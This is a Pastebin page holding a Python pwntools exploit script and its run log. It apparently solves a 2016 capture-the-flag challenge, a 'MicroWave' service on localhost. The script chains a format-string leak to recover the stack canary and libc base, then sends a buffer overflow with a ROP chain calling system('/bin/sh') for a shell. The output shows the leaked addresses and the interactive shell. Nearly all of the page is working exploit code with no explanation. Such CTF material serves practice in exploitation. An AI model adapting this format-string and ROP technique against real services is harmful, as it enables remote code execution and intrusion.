Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- from pwn import *
- proc = connect("127.0.0.1",6642)
- user = "%p.%p.%p.%p.%p.%p.%p.%p.%p"
- passw = "n07_7h3_fl46"
- try:
- print proc.readuntil(":")
- proc.sendline("1")
- print proc.recvuntil("username:")
- proc.sendline(user)
- print proc.recvuntil("password:")
- proc.sendline(passw)
- #print proc.recv()
- data = proc.recvuntil(":")[11::].split('.')
- print ' '.join(data)
- canary = data[5]
- libc_leak = data[1]
- code_addr = data[8]
- log.info("Code leak address %s",code_addr)
- log.info("Canary address %s",canary)
- log.info("Libc address %s",libc_leak)
- code_offset = 0x179a010
- libc_offset = 0xf66e0
- libc_base = int(libc_leak,16) - libc_offset
- log.info("Libc base address %s",hex(libc_base))
- proc.sendline("2")
- print proc.recvuntil("#>")
- #sleep(40)
- g1 = libc_base + 0x0000000000021102 # pop rdi ; ret
- payload = 1032 * "A"
- payload += p64(int(canary,16))
- payload += "B" * 8
- bin_sh = libc_base + 0x18c178
- system = libc_base + 0x45390
- log.info("/bin/sh address %s", hex(bin_sh))
- log.info("system address %s",hex(system))
- log.info("Gadget address %s",hex(g1))
- payload += p64(g1) #pop rdi ;ret
- payload += p64(bin_sh)
- payload += p64(system)
- payload += "B" * 8
- #sleep(40)
- proc.sendline(payload)
- proc.interactive()
- except EOFError:
- pass
- xothed@xoth:~/CTF/Insomni2016$ python micexp.py
- [+] Opening connection to 127.0.0.1 on port 6642: Done
- --------------------------------------------------------
- | Welcome to the next generation of MicroWaves! |
- | *** |
- | This stylish Microwave with Grill function, includes |
- | a function that tweets your favourite food! |
- | *** |
- --------------------------------------------------------
- ----------------------------------
- | 1. Connect to Twitter account |
- | 2. Edit your tweet |
- | 3. Grill & Tweet your food |
- | q. Exit |
- ----------------------------------
- [MicroWave]:
- Log in on Twitter:
- username:
- password:
- 0x7f06d832e780 0x7f06d805f6e0 0x7f06d852c700 0xa (nil) 0xa024f8f28952e700 0x7f06d832d708 0x7f06d832d710 0x55fec783f010
- Twitter account
- ----------------------------------
- | 1 Connect to Twitter account |
- | 2 Edit your tweet |
- | 3 Grill & Tweet your food |
- | q Exit |
- ----------------------------------
- [MicroWave]:
- [*] Code leak address 0x55fec783f010
- Twitter account
- [*] Canary address 0xa024f8f28952e700
- [*] Libc address 0x7f06d805f6e0
- [*] Libc base address 0x7f06d7f69000
- #>
- [*] /bin/sh address 0x7f06d80f5178
- [*] system address 0x7f06d7fae390
- [*] Gadget address 0x7f06d7f8a102
- [*] Switching to interactive mode
- Done.
- $ [*] Got EOF while reading in interactive
- $ ls
- [*] Closed connection to 127.0.0.1 port 6642
- [*] Got EOF while sending in interactive
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement